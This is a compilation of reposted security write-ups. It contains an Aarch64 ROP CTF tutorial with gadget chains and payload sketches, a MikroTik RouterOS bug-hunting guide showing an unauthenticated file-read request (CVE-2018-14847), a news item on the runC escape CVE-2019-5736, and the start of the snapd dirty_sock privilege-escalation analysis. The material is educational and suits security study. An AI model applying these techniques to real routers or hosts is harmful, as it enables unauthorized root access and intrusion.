ROP-ing on Aarch64 — The CTF Style

Original text by Perfect Blue

Aarch64 basics

Before we dive into the challenge, let’s just skim over the basics quickly. I’ll try to explain everything to the best of my ability and knowledge.


Aarch64 has 31 general purpose registers, x0 to x30. Since it’s a 64 bit architechture, all the registers are 64 bit. But we can access the lower 32 bits of thes registers by using them with the w prefix, such as w0 and w1.

There is also a 32nd register, known as xzr or the zero register. It has multiple uses which I won’t go into but in certain contexts, it is used as the stack pointer (esp equivalent) and is thereforce aliased as sp.


Here are some basic instructions:

  • mov — Just like it’s x86 counterpart, copies one register into another. It can also be used to load immediate values. mov x0, x1; copies x1 into x0 mov x1, 0x4141; loads the value 0x4141 in x1
  • str/ldr — store and load register. Basically stores and loads a register from the given pointer. str x0, [x29]; store x0 at the address in x29 ldr x0, [x29]; load the value from the address in x29 into x0
    • stp/ldp — store and load a pair of registers. Same as str/ldr but instead with a pair of registers stp x29, x30, [sp]; store x29 at sp and x30 at sp+8
  • bl/blr — Branch link (to register). The x86 equivalent is call. Basically jumps to a subroutine and stores the return address in x30. blr x0; calls the subroutine at the address stored in x0
  • b/br — Branch (to register). The x86 equivalent is jmp. Basically jumps to the specified address br x0; jump to the address stored in x0
  • ret — Unlike it’s x86 equivalent which pops the return address from stack, it looks for the return address in the x30 register and jumps there.

Indexing modes

Unlike x86, load/store instructions in Aarch64 has three different indexing “modes” to index offsets:

  • Immediate offset : [base, #offset] — Index an offset directly and don’t mess with anything else ldr x0, [sp, 0x10]; load x0 from sp+0x10
  • Pre-indexed : [base, #offset]! — Almost the same as above, except that base+offset is written back into base. ldr x0, [sp, 0x10]!; load x0 from sp+0x10 and then increase sp by 0x10
  • Post-indexed : [base], #offset — Use the base directly and then write base+offset back into the base ldr x0, [sp], 0x10; load x0 from sp and then increase sp by 0x10

Stack and calling conventions

  • The registers x0 to x7 are used to pass parameters to subroutines and extra parameters are passed on the stack.
  • The return address is stored in x30, but during nested subroutine calls, it gets preserved on the stack. It is also known as the link register.
  • The x29 register is also known as the frame pointer and it’s x86 equivalent is ebp. All the local variables on the stack are accessed relative to x29 and it holds a pointer to the previous stack frame, just like in x86.
    • One interesting thing I noticed is that even though ebp is always at the bottom of the current stack frame with the return address right underneath it, the x29 is stored at an optimal position relative to the local variables. In my minimal testcases, it was always stored on the top of the stack (along with the preserved x30) and the local variables underneath it (basically a flipped oritentation compared to x86).

The challenge

We are provided with the challenge files and the following description:

Challenge runs on ubuntu 18.04 aarch64, chrooted

It comes with the challenge binary, the libc and a placeholder flag file. It was the mentioned that the challenge is being run in a chroot, so we probably can’t get a shell and would need to do a open/read/write ropchain.

The first thing we need is to set-up an environment. Fortunately, AWS provides pre-built Aarch64 ubuntu server images and that’s what we will use from now on.

Part 1 — The heap

Not Yet Another Note Challenge...
====== menu ======
1. alloc
2. view
3. edit
4. delete
5. quit

We are greeted with a wonderful and familiar (if you’re a regular CTFer) prompt related to heap challenges.

Playing with it a little, we discover an int underflow in the alloc function, leading to a heap overflow in the edit function:

__int64 do_add()
  __int64 v0; // x0
  int v1; // w0
  signed __int64 i; // [xsp+10h] [xbp+10h]
  __int64 v4; // [xsp+18h] [xbp+18h]

  for ( i = 0LL; ; ++i )
    if ( i > 7 )
      return puts("no more room!");
    if ( !mchunks[i].pointer )
  v0 = printf("len : ");
  v4 = read_int(v0);
  mchunks[i].pointer = malloc(v4);
  if ( !mchunks[i].pointer )
    return puts("couldn't allocate chunk");
  printf("data : ");
  v1 = read(0LL, mchunks[i].pointer, v4 - 1);
  LOWORD(mchunks[i].size) = v1;
  *(_BYTE *)(mchunks[i].pointer + v1) = 0;
  return printf("chunk %d allocated\n");

__int64 do_edit()
  __int64 v0; // x0
  __int64 result; // x0
  int v2; // w0
  __int64 v3; // [xsp+10h] [xbp+10h]

  v0 = printf("index : ");
  result = read_int(v0);
  v3 = result;
  if ( result >= 0 && result <= 7 )
    result = LOWORD(mchunks[result].size);
    if ( LOWORD(mchunks[v3].size) )
      printf("data : ");
      v2 = read(0LL, mchunks[v3].pointer, (unsigned int)LOWORD(mchunks[v3].size) - 1);
      LOWORD(mchunks[v3].size) = v2;
      result = mchunks[v3].pointer + v2;
      *(_BYTE *)result = 0;
  return result;

If we enter 0 as len in alloc, it would allocate a valid heap chunk and read -1 bytes into it. Because read uses unsigned values, -1 would become 0xffffffffffffffff and the read would error out as it’s not possible to read such a huge value.

With read erroring out, the return value (-1 for error) would then be stored in the size member of the global chunk struct. In the edit function, the size is used as a 16 bit unsigned int, so -1 becomes 0xffff, leading to the overflow

Since this post is about ROP-ing and the heap in Aarch64 is almost the same as x86, I’ll just be skimming over the heap exploit.

  • Because there was no free() in the binary, we overwrote the size of the top_chunk which got freed in the next allocation, giving us a leak.
  • Since the challenge server was using libc2.27, tcache was available which made our lives a lot easier. We could just overwrite the FD of the top_chunk to get an arbitrary allocation.
  • First we leak a libc address, then use it to get a chunk near environ, leaking a stack address. Finally, we allocate a chunk near the return address (saved x30 register) to start writing our ROP-chain.

Part 2 — The ROP-chain

Now starts the interesting part. How do we find ROP gadgets in Aarch64?

Fortunately for us, ropper supports Aarch64. But what kind of gadgets exist in Aarch64 and how can we use them?

$ ropper -f 
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%


0x00091ac4: add sp, sp, #0x140; ret; 
0x000bf0dc: add sp, sp, #0x150; ret; 
0x000c0aa8: add sp, sp, #0x160; ret; 

Aaaaand we are blasted with a shitload of gadgets.

  • Most of the these are actually not very useful as the ret depends on the x30 register. The address in x30 is where gadget will return when it executes a ret.
  • If the gadget doesn’t modify x30 in a way we can control it, we won’t be able to control the exectuion flow and get to the next gadget.

So to get a ROP-chain running in Aarch64, we can only use the gadgets which:

  • perform the function we want
  • pop x30 from the stack
  • ret

With our heap exploit, we were only able to allocate a 0x98 chunk on the stack and the whole open/read/write chain would take a lot more space, so the first thing we need is to read in a second ROP-chain.

One way to do that is to call gets(stack_address), so we can basically write an infinite ROP-chain on the stack (provided no newlines).

So how do we call gets()? It’s a libc function and we already have a libc leak, the only thing we need is to get the address of gets in x30 and a stack address in x0 (function parameters are passedin x0 to x7).

After a bit of gadget hunting, here is the gadget I settled upon:

0x00062554: ldr x0, [x29, #0x18]; ldp x29, x30, [sp], #0x20; ret;

It essentially loads x0 from x29+0x18 and then pop x29 and x30 from the top of the stack (ldp xx,xy [sp] is essentially equal to popping). It then moves stack down by 0x20 (sp+0x20 in post indexed addressing).

In almost all the gadgets, most of loads/stores are done relative to x29 so we need to make sure we control it properely too.

Here is how the stack looks at the epilogue of the alloc function just before the execution of our first gadget.


It pops the x29 and x30 from the stack and returns, jumping to our first gadget. Since we control x29, we control x0.

Now the only thing left is to return to gets, but it won’t work if we return directly at the top of gets.

Why? Let’s look at the prologue of gets

<_IO_gets>:    stp    x29, x30, [sp, #-48]!
<_IO_gets+4>:    mov    x29, sp

gets assume that the return address is in x30 (it would be in a normal execution) and thus it tries to preserve it on the stack along with x29.

Unfortunately for us, since we reached there with ret, the x30 holds the address of gets itself.

If this continues, it would pop the preserved x30 at the end of gets and then jump back to gets again in an infinite loop.

To bypass it, we use a simple trick and return at gets+0x8, skipping the preservation. This way, when it pops x30 at the end, we would be able to control it and jump to our next gadget.

This is the rough sketch of our first stage ROP-chain:

gadget = libcbase + 0x00062554 #0x0000000000062554 : ldr x0, [x29, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret // to control x0

payload = ""

payload += p64(next_x29) + p64(gadget) + p64(0x0) + p64(0x8) # 0x0 and 0x8 are the local variables that shouldn't be overwritten
payload += p64(next_x29) + p64(gets_address) + p64(0x0) + p64(new_x29_stack) # Link register pointing to the next frame + gets() of libc + just a random stack variable + param popped by gadget_1 into x1 (for param of gets)

Now that we have infinite space for our second stage ROP-chain, what should we do?

At first we decided to do the open/read/write all in ROP but it would make it unnecessarily long and complex, so instead we mprotect() the stack to make it executable and then jump to shellcode we placed on the stack.

mprotect takes 3 arguments, so we need to control x0, x1 and x2 to succeed.

Well, we began gadget hunting again. We already control x0, so we found this gadget:

gadget_1 = 0x00000000000ed2f8 : mov x1, x0 ; ret

At first glance, it looks perfect, copying x0 into x1. But if you have been paying close attention, you would realize it doesn’t modify x30, so we won’t be able to control execution beyond this.

What if we take a page from JOP (jump oriented programming) and find a gadget which given us the control of x30 and then jumps (not call) to another user controlled address?

gadget_2 = 0x000000000006dd74 :ldp x29, x30, [sp], #0x30 ; br x3

Oh wowzie, this one gives us the control of x30 and then jumps to x3. Now we just need to control x3…..

gadget_3 = 0x000000000003f8c8 : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret

gadget_4 = 0x0000000000026dc4 : mov x3, x19 ; mov x2, x26 ; blr x20

The first gadget here gives us control of x19 and x20, the second one moves x19 into x3 and calls x20.

Chaining these two, we can control x3 and still have control over the execution.

Here’s our plan:

  • Have x0 as 0x500 (mprotect length) with the same gadget we used before
  • Use gadget_3 to make x19 = gadget_1 and x20 = gadget_2
  • return to gadget_4 from gadget_3, making x3 = x19 (gadget_1)
  • gadget_4 calls x20 (gadget_2)
  • gadget_2 gives us a controlled x30 and jumps to x3 (gadget_1)
  • gadget_1 moves x0 (0x500) into x1 and returns

Here’s the rough code equivalent:

payload = ""

payload += p64(next_x29) + p64(gadget_3) + p64(0x0) * x (depends on stack) #returns to gadget_3

payload += p64(next_x29) + p64(gadget_4) + p64(gadget_1) + p64(gadget_2) + p64(0x0) * 4 # moves gadget_1/3 into x19/20 and returns to gadget_4

payload += p64(next_x29) + p64(next_gadget) #setting up for the next gadget and moving x19 into x3. x20 (gadget_2) is called from gadget_4

That was haaard, now let’s see how we can control x2…

gadget_6 = 0x000000000004663c : mov x2, x21 ; blr x3

This is the only new gadget we need. It moves x21 into x2 and calls x3. We can already control x21 and x3 with the help of gadget_4 and gadget_3.

Now that we have full control over x0, x1 and x2, we just need to put it all together and shellcode the flag read. I won’t go into details about that.

And that’s a wrap folks, you can find our final exploit here


Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.

Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMWare.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.

Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.

Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton programthat you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
std::cerr << "Failed to connect to the remote host"
<< std::endl;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is bolded).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
std::cerr << "Failed to connect to the remote host"
<< std::endl;
WinboxMessage msg;

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe00016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looperconstructor’s only code cross reference.

Follow the offset to vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve bolded the new part.

WinboxMessage msg;
std::cout << "req: " << msg.serialize_to_json() << std::endl;
if (!winboxSession.receive(msg))
std::cerr << "Error receiving a response." << std::endl;
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
std::cerr << msg.get_error_string() << std::endl;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo

There’s Rarely Just One

In the previous example, you looked at the main handler in undo which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is “none of them” look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_commandcode. You’ll also want to insert the add_string. I’ve bolded the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
std::cerr << "Failed to connect to the remote host"
<< std::endl;
WinboxMessage msg;
msg.set_to(2,2); // mproxy, second handler
msg.add_string(1, "list"); // the file to open

std::cout << "req: " << msg.serialize_to_json() << std::endl;
if (!winboxSession.receive(msg))
std::cerr << "Error receiving a response." << std::endl;
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.


I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

SensorsTechForum NEWSTHREAT REMOVALREVIEWSFORUMSSEARCH NEWS CVE-2019-5736 Linux Flaw in runC Allows Unauthorized Root Access

Original text by Milena Dimitrova

CVE-2019-5736 is yet another Linux vulnerability discovered in the core runC container code. The runC tool is described as a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.

CVE-2019-5736 Technical Details

The security flaw potentially affects several open-source container management systems. Shortly said, the flaw allows attackers to get unauthorized, root access to the host operating system, thus escaping Linux container.

In more technical terms, the vulnerability:

allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe, as explained in the official advisory.

The CVE-2019-5736 vulnerability was unearthed by open source security researchers Adam Iwaniuk and Borys Popławski. However, it was publicly disclosed by Aleksa Sarai, a senior software engineer and runC maintainer at SUSE Linux GmbH on Monday.

“I am one of the maintainers of runc (the underlying container runtime underneath Docker, cri-o, containerd, Kubernetes, and so on). We recently had a vulnerability reported which we have verified and have a
patch for,” Sarai wrote.

The researcher also said that a malicious user would be able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

– Creating a new container using an attacker-controlled image.
– Attaching (docker exec) into an existing container which the attacker had previous write access to.

It should also be noted that CVE-2019-5736 isn’t blocked by the default AppArmor policy, nor
by the default SELinux policy on Fedora[++], due to the fact that container processes appear to be running as container_runtime_t.

Nonetheless, the flaw is blocked through correct use of user namespaces where the host root is not mapped into the container’s user namespace.

 Related: CVE-2018-14634: Linux Mutagen Astronomy Vulnerability Affects RHEL and Cent OS Distros

CVE-2019-5736 Patch and Mitigation

Red Hat says that the flaw can be mitigated when SELinux is enabled in targeted enforcing mode, a condition which comes by default on RedHat Enterprise Linux, CentOS, and Fedora.

There’s also a patch released by the maintainers of runC available on GitHub. Please note that all projects which are based on runC should apply the patches themselves.

Who’s Affected?

Debian and Ubuntu are vulnerable to the vulnerability, as well as container systems running LXC, a Linux containerization tool prior to Docker. Apache Mesos container code is also affected.

Companies such as Google, Amazon, Docker, and Kubernetes are have also released fixes for the flaw.

Privilege Escalation in Ubuntu Linux (dirty_sock exploit)

Original text by Chris Moberly

In January 2019, I discovered a privilege escalation vulnerability in default installations of Ubuntu Linux. This was due to a bug in the snapd API, a default service. Any local user could exploit this vulnerability to obtain immediate root access to the system.

Two working exploits are provided in the dirty_sock repository:

  1. dirty_sockv1: Uses the ‘create-user’ API to create a local user based on details queried from the Ubuntu SSO.
  2. dirty_sockv2: Sideloads a snap that contains an install-hook that generates a new local user.

Both are effective on default installations of Ubuntu. Testing was mostly completed on 18.10, but older verions are vulnerable as well.

The snapd team’s response to disclosure was swift and appropriate. Working with them directly was incredibly pleasant, and I am very thankful for their hard work and kindness. Really, this type of interaction makes me feel very good about being an Ubuntu user myself.


snapd serves up a REST API attached to a local UNIX_AF socket. Access control to restricted API functions is accomplished by querying the UID associated with any connections made to that socket. User-controlled socket peer data can be affected to overwrite a UID variable during string parsing in a for-loop. This allows any user to access any API function.

With access to the API, there are multiple methods to obtain root. The exploits linked above demonstrate two possibilities.

Background — What is Snap?

In an attempt to simplify packaging applications on Linux systems, various new competing standards are emerging. Canonical, the makers of Ubuntu Linux, are promoting their “Snap” packages. This is a way to roll all application dependencies into a single binary — similar to Windows applications.

The Snap ecosystem includes an “app store” where developers can contribute and maintain ready-to-go packages.

Management of locally installed snaps and communication with this online store are partially handled by a systemd service called “snapd”. This service is installed automatically in Ubuntu and runs under the context of the “root” user. Snapd is evolving into a vital component of the Ubuntu OS, particularly in the leaner spins like “Snappy Ubuntu Core” for cloud and IoT.

Vulnerability Overview

Interesting Linux OS Information

The snapd service is described in a systemd service unit file located at /lib/systemd/system/snapd.service.

Here are the first few lines:

Description=Snappy daemon

This leads us to a systemd socket unit file, located at /lib/systemd/system/snapd.socket

The following lines provide some interesting information:


Linux uses a type of UNIX domain socket called “AF_UNIX” which is used to communicate between processes on the same machine. This is in contrast to “AF_INET” and “AF_INET6” sockets, which are used for processes to communicate over a network connection.

The lines shown above tell us that two socket files are being created. The ‘0666’ mode is setting the file permissions to read and write for all, which is required to allow any process to connect and communicate with the socket.

We can see the filesystem representation of these sockets here:

$ ls -aslh /run/snapd*
0 srw-rw-rw- 1 root root  0 Jan 25 03:42 /run/snapd-snap.socket
0 srw-rw-rw- 1 root root  0 Jan 25 03:42 /run/snapd.socket

Interesting. We can use the Linux “nc” tool (as long as it is the BSD flavor) to connect to AF_UNIX sockets like these. The following is an example of connecting to one of these sockets and simply hitting enter.

$ nc -U /run/snapd.socket

HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close

400 Bad Request

Even more interesting. One of the first things an attacker will do when compromising a machine is to look for hidden services that are running in the context of root. HTTP servers are prime candidates for exploitation, but they are usually found on network sockets.

This is enough information now to know that we have a good target for exploitation — a hidden HTTP service that is likely not widely tested as it is not readily apparent using most automated privilege escalation checks.

NOTE: Check out my work-in-progress privilege escalation tool uptux that would identify this as interesting.

Vulnerable Code

Being an open-source project, we can now move on to static analysis via source code. The developers have put together excellent documentation on this REST API available here.

The API function that stands out as highly desirable for exploitation is “POST /v2/create-user”, which is described simply as “Create a local user”. The documentation tells us that this call requires root level access to execute.

But how exactly does the daemon determine if the user accessing the API already has root?

Reviewing the trail of code brings us to this file (I’ve linked the historically vulnerable version).

Let’s look at this line:

ucred, err := getUcred(int(f.Fd()), sys.SOL_SOCKET, sys.SO_PEERCRED)

This is calling one of golang’s standard libraries to gather user information related to the socket connection.

Basically, the AF_UNIX socket family has an option to enable receiving of the credentials of the sending process in ancillary data (see man unix from the Linux command line).

This is a fairly rock solid way of determining the permissions of the process accessing the API.

Using a golang debugger called delve, we can see exactly what this returns while executing the “nc” command from above. Below is the output from the debugger when we set a breakpoint at this function and then use delve’s “print” command to show what the variable “ucred” currently holds:

   109:			ucred, err := getUcred(int(f.Fd()), sys.SOL_SOCKET, sys.SO_PEERCRED)
=> 110:			if err != nil {
(dlv) print ucred
*syscall.Ucred {Pid: 5388, Uid: 1000, Gid: 1000}

That looks pretty good. It sees my uid of 1000 and is going to deny me access to the sensitive API functions. Or, at least it would if these variables were called exactly in this state. But they are not.

Instead, some additional processing happens in this function, where connection info is added to a new object along with the values discovered above:

func (wc *ucrednetConn) RemoteAddr() net.Addr {
	return &ucrednetAddr{wc.Conn.RemoteAddr(),, wc.uid, wc.socket}

…and then a bit more in this one, where all of these values are concatenated into a single string variable:

func (wa *ucrednetAddr) String() string {
	return fmt.Sprintf("pid=%s;uid=%s;socket=%s;%s",, wa.uid, wa.socket, wa.Addr)

..and is finally parsed by this function, where that combined string is broken up again into individual parts:

func ucrednetGet(remoteAddr string) (pid uint32, uid uint32, socket string, err error) {
	for _, token := range strings.Split(remoteAddr, ";") {
		var v uint64
		} else if strings.HasPrefix(token, "uid=") {
			if v, err = strconv.ParseUint(token[4:], 10, 32); err == nil {
				uid = uint32(v)
			} else {

What this last function does is split the string up by the “;” character and then look for anything that starts with “uid=”. As it is iterating through all of the splits, a second occurrence of “uid=” would overwrite the first.

If only we could somehow inject arbitrary text into this function…

Going back to the delve debugger, we can take a look at this “remoteAddr” string and see what it contains during a “nc” connection that implements a proper HTTP GET request:


$ nc -U /run/snapd.socket
GET / HTTP/1.1

Debug output:
=>  41:		for _, token := range strings.Split(remoteAddr, ";") {
(dlv) print remoteAddr

Now, instead of an object containing individual properties for things like the uid and pid, we have a single string variable with everything concatenated together. This string contains four unique elements. The second element “uid=1000” is what is currently controlling permissions.

